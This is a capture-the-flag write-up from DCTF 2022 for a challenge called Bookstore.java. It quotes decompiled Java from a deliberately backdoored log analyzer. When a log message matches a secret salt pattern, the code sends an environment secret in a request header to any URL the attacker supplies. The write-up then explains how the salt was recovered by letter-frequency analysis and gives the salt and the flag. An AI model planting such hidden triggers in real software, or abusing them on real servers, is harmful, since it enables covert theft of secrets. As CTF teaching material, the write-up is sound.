I took part to the DCTF 2022 with the team Ulisse from the University of Bologna.
The Bookstore.java challenge stated that:
Web developer left the company becouse he was not being paid. He left some hidden features for him, to bypass security. Can you find the vunerability? http://book-store.dragonsec.si
And gave us a book_store.jar
file.
The Log4Book
If we open the jarfile with a decompiler (like JD-GUI) we can see that there is a vulnerability in the log analyzer.
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
substring2 = matcher2.group();
}
if (substring2 != null) {
downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}
If the log string contains the template get{...}salt=
plus the environment var SALT
the program tries to send an HTTP request to the url between {...}
with the header Not-Found:
and the env var NOT_FOUND
as the value (which I suppose is the flag).
URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));
Finding the SALT environment value
We're given a hint:
Method how the salt is generated is given through variable names in one java class. The salt is 8 chars long.
If we look at the class Art
we can see that there are two strange variable names:
> String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);
which create: frequency analysis should be fun
Analyzing the frequency
Inside the jar we find a book.json file, which has 8 paragraphs of a shakespearian play.
After trying to find some studies about the frequency analisis of Shakespeare plays without any result, we remember that the hint stated that the salt is 8 chars and there are exactly 8 paragraphs in the page presented in the website and in the file book.json
.
If we join the most repeated letter of each paragraph, we get the salt and then we can get the program to ping our url (ngrok) with the flag.
Salt:
oeeeeooo
Flag:
dctf{L0g_4_hid3n_d@7@\_n0t\_s0\_h@rd_righ7}
Top comments (0)